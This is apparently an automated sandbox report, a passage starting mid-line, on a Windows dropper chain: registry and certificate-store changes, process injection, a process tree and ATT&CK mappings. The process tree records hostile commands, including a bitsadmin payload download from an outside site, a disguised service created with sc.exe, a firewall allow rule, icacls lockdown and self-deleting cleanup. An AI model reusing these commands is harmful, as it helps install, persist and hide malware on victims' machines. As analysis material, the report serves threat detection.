Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 01000000cd82a5685d8a5b45b76fe81fb6cb24ada593f621e1a75cd4222748175e751c5ab4260be1a63e6cc7c57271264603f76d7cd55debeb17868daec1198351f2 MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Rumukerije.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Rumukerije.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5616 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3832 ultramediaburner.tmp 3832 ultramediaburner.tmp 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe 1528 Gudajetaru.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 3772 Ultra.exe Token: SeDebugPrivilege 2116 Rumukerije.exe Token: SeDebugPrivilege 1528 Gudajetaru.exe Token: SeDebugPrivilege 1140 MicrosoftEdge.exe Token: SeDebugPrivilege 1140 MicrosoftEdge.exe Token: SeDebugPrivilege 1140 MicrosoftEdge.exe Token: SeDebugPrivilege 1140 MicrosoftEdge.exe Token: SeDebugPrivilege 4876 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4876 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4876 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4876 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4780 rundll32.exe Token: SeDebugPrivilege 4780 rundll32.exe Token: SeTcbPrivilege 2904 svchost.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3832 ultramediaburner.tmp -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 1140 MicrosoftEdge.exe 4816 MicrosoftEdgeCP.exe 4816 MicrosoftEdgeCP.exe 4600 google-game.exe 4600 google-game.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 3692 wrote to memory of 2044 3692 Install.exe 76 PID 3692 wrote to memory of 2044 3692 Install.exe 76 PID 3692 wrote to memory of 2044 3692 Install.exe 76 PID 2044 wrote to memory of 3772 2044 Install.tmp 77 PID 2044 wrote to memory of 3772 2044 Install.tmp 77 PID 3772 wrote to memory of 3808 3772 Ultra.exe 81 PID 3772 wrote to memory of 3808 3772 Ultra.exe 81 PID 3772 wrote to memory of 3808 3772 Ultra.exe 81 PID 3808 wrote to memory of 3832 3808 ultramediaburner.exe 82 PID 3808 wrote to memory of 3832 3808 ultramediaburner.exe 82 PID 3808 wrote to memory of 3832 3808 ultramediaburner.exe 82 PID 3832 wrote to memory of 1236 3832 ultramediaburner.tmp 83 PID 3832 wrote to memory of 1236 3832 ultramediaburner.tmp 83 PID 3772 wrote to memory of 2116 3772 Ultra.exe 84 PID 3772 wrote to memory of 2116 3772 Ultra.exe 84 PID 3772 wrote to memory of 1528 3772 Ultra.exe 85 PID 3772 wrote to memory of 1528 3772 Ultra.exe 85 PID 1528 wrote to memory of 4484 1528 Gudajetaru.exe 90 PID 1528 wrote to memory of 4484 1528 Gudajetaru.exe 90 PID 4484 wrote to memory of 4684 4484 cmd.exe 92 PID 4484 wrote to memory of 4684 4484 cmd.exe 92 PID 4484 wrote to memory of 4684 4484 cmd.exe 92 PID 1528 wrote to memory of 4388 1528 Gudajetaru.exe 95 PID 1528 wrote to memory of 4388 1528 Gudajetaru.exe 95 PID 4388 wrote to memory of 4600 4388 cmd.exe 97 PID 4388 wrote to memory of 4600 4388 cmd.exe 97 PID 4388 wrote to memory of 4600 4388 cmd.exe 97 PID 4600 wrote to memory of 4780 4600 google-game.exe 98 PID 4600 wrote to memory of 4780 4600 google-game.exe 98 PID 4600 wrote to memory of 4780 4600 google-game.exe 98 PID 4780 wrote to memory of 2904 4780 rundll32.exe 70 PID 4780 wrote to memory of 2824 4780 rundll32.exe 17
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2824
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Users\Admin\AppData\Local\Temp\is-3R4PT.tmp\Install.tmp"C:\Users\Admin\AppData\Local\Temp\is-3R4PT.tmp\Install.tmp" /SL5="$301CE,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Users\Admin\AppData\Local\Temp\is-CATC3.tmp\Ultra.exe"C:\Users\Admin\AppData\Local\Temp\is-CATC3.tmp\Ultra.exe" /S /UID=burnerch13⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3772 -
C:\Program Files\Mozilla Firefox\NWJBEIFHIK\ultramediaburner.exe"C:\Program Files\Mozilla Firefox\NWJBEIFHIK\ultramediaburner.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Users\Admin\AppData\Local\Temp\is-IPSMR.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-IPSMR.tmp\ultramediaburner.tmp" /SL5="$3011C,281924,62464,C:\Program Files\Mozilla Firefox\NWJBEIFHIK\ultramediaburner.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu6⤵
- Executes dropped EXE
PID:1236
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0d-ad1a5-5d4-4f88c-a56e40a2ddaea\Rumukerije.exe"C:\Users\Admin\AppData\Local\Temp\0d-ad1a5-5d4-4f88c-a56e40a2ddaea\Rumukerije.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2116
-
-
C:\Users\Admin\AppData\Local\Temp\22-0a327-962-54098-adcd128fe56c4\Gudajetaru.exe"C:\Users\Admin\AppData\Local\Temp\22-0a327-962-54098-adcd128fe56c4\Gudajetaru.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pppxq4nj.1v1\instEU.exe & exit5⤵
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\Users\Admin\AppData\Local\Temp\pppxq4nj.1v1\instEU.exeC:\Users\Admin\AppData\Local\Temp\pppxq4nj.1v1\instEU.exe6⤵
- Executes dropped EXE
PID:4684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vojoyua5.usp\google-game.exe & exit5⤵
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Users\Admin\AppData\Local\Temp\vojoyua5.usp\google-game.exeC:\Users\Admin\AppData\Local\Temp\vojoyua5.usp\google-game.exe6⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install7⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4780
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\11ram0x4.gjw\md1_1eaf.exe & exit5⤵PID:4740
-
C:\Users\Admin\AppData\Local\Temp\11ram0x4.gjw\md1_1eaf.exeC:\Users\Admin\AppData\Local\Temp\11ram0x4.gjw\md1_1eaf.exe6⤵PID:4396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rwt2xvav.tlm\y1.exe & exit5⤵PID:5908
-
C:\Users\Admin\AppData\Local\Temp\rwt2xvav.tlm\y1.exeC:\Users\Admin\AppData\Local\Temp\rwt2xvav.tlm\y1.exe6⤵PID:4368
-
C:\Users\Admin\AppData\Local\Temp\xwuU7qjiFG.exe"C:\Users\Admin\AppData\Local\Temp\xwuU7qjiFG.exe"7⤵PID:3336
-
C:\Users\Admin\AppData\Roaming\1619334021542.exe"C:\Users\Admin\AppData\Roaming\1619334021542.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619334021542.txt"8⤵PID:4872
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\xwuU7qjiFG.exe"8⤵PID:6000
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 39⤵
- Runs ping.exe
PID:5616
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\rwt2xvav.tlm\y1.exe"7⤵PID:6132
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
PID:6076
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t0eabyl1.ynq\askinstall39.exe & exit5⤵PID:5344
-
C:\Users\Admin\AppData\Local\Temp\t0eabyl1.ynq\askinstall39.exeC:\Users\Admin\AppData\Local\Temp\t0eabyl1.ynq\askinstall39.exe6⤵PID:5136
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵PID:5572
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
PID:5896
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zfunlz50.cbf\inst.exe & exit5⤵PID:5568
-
C:\Users\Admin\AppData\Local\Temp\zfunlz50.cbf\inst.exeC:\Users\Admin\AppData\Local\Temp\zfunlz50.cbf\inst.exe6⤵PID:5904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\deajxd0r.jod\SunLabsPlayer.exe /S & exit5⤵PID:4392
-
C:\Users\Admin\AppData\Local\Temp\deajxd0r.jod\SunLabsPlayer.exeC:\Users\Admin\AppData\Local\Temp\deajxd0r.jod\SunLabsPlayer.exe /S6⤵PID:5280
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa7AA6.tmp\tempfile.ps1"7⤵PID:6068
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa7AA6.tmp\tempfile.ps1"7⤵PID:1396
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa7AA6.tmp\tempfile.ps1"7⤵PID:5964
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa7AA6.tmp\tempfile.ps1"7⤵PID:2952
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa7AA6.tmp\tempfile.ps1"7⤵PID:5236
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa7AA6.tmp\tempfile.ps1"7⤵PID:4404
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa7AA6.tmp\tempfile.ps1"7⤵PID:2368
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z7⤵
- Download via BitsAdmin
PID:5988
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xkuep0kn.gxi\GcleanerWW.exe /mixone & exit5⤵PID:5316
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pzlrxll5.pwb\toolspab1.exe & exit5⤵PID:5588
-
C:\Users\Admin\AppData\Local\Temp\pzlrxll5.pwb\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\pzlrxll5.pwb\toolspab1.exe6⤵PID:5240
-
C:\Users\Admin\AppData\Local\Temp\pzlrxll5.pwb\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\pzlrxll5.pwb\toolspab1.exe7⤵PID:5452
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gf0fxqf5.x2b\c7ae36fa.exe & exit5⤵PID:6040
-
C:\Users\Admin\AppData\Local\Temp\gf0fxqf5.x2b\c7ae36fa.exeC:\Users\Admin\AppData\Local\Temp\gf0fxqf5.x2b\c7ae36fa.exe6⤵PID:2220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x55gnj2v.je3\app.exe /8-2222 & exit5⤵PID:5464
-
C:\Users\Admin\AppData\Local\Temp\x55gnj2v.je3\app.exeC:\Users\Admin\AppData\Local\Temp\x55gnj2v.je3\app.exe /8-22226⤵PID:6008
-
C:\Users\Admin\AppData\Local\Temp\x55gnj2v.je3\app.exe"C:\Users\Admin\AppData\Local\Temp\x55gnj2v.je3\app.exe" /8-22227⤵PID:4204
-
-
-
-
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2904 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵PID:5028
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1140
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:4136
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4816
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4876
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5704
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6108
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5884
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:2268
-
C:\Users\Admin\AppData\Local\Temp\6497.exeC:\Users\Admin\AppData\Local\Temp\6497.exe1⤵PID:2320
-
C:\Users\Admin\AppData\Local\Temp\661E.exeC:\Users\Admin\AppData\Local\Temp\661E.exe1⤵PID:6032
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\889dd0f4-8600-4da5-a87b-e197be63606c" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
PID:5304
-
-
C:\Users\Admin\AppData\Local\Temp\666D.exeC:\Users\Admin\AppData\Local\Temp\666D.exe1⤵PID:5364
-
C:\Users\Admin\AppData\Local\Temp\6CD7.exeC:\Users\Admin\AppData\Local\Temp\6CD7.exe1⤵PID:5576
-
C:\Users\Admin\AppData\Local\Temp\7777.exeC:\Users\Admin\AppData\Local\Temp\7777.exe1⤵PID:4900
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\oryydydm\2⤵PID:4124
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\mzlibotd.exe" C:\Windows\SysWOW64\oryydydm\2⤵PID:212
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create oryydydm binPath= "C:\Windows\SysWOW64\oryydydm\mzlibotd.exe /d\"C:\Users\Admin\AppData\Local\Temp\7777.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:5956
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description oryydydm "wifi internet conection"2⤵PID:2028
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start oryydydm2⤵PID:3336
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:4832
-
-
C:\Users\Admin\AppData\Local\Temp\7D83.exeC:\Users\Admin\AppData\Local\Temp\7D83.exe1⤵PID:5072
-
C:\Users\Admin\AppData\Local\Temp\8DD0.exeC:\Users\Admin\AppData\Local\Temp\8DD0.exe1⤵PID:4100
-
C:\Users\Admin\AppData\Local\Temp\9989.exeC:\Users\Admin\AppData\Local\Temp\9989.exe1⤵PID:5308
-
C:\Windows\SysWOW64\oryydydm\mzlibotd.exeC:\Windows\SysWOW64\oryydydm\mzlibotd.exe /d"C:\Users\Admin\AppData\Local\Temp\7777.exe"1⤵PID:5748
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵PID:4408
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5004
Network
MITRE ATT&CK Enterprise v6
Persistence
BITS Jobs
1Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
1Defense Evasion
BITS Jobs
1File and Directory Permissions Modification
1Install Root Certificate
1Modify Registry
3Web Service
1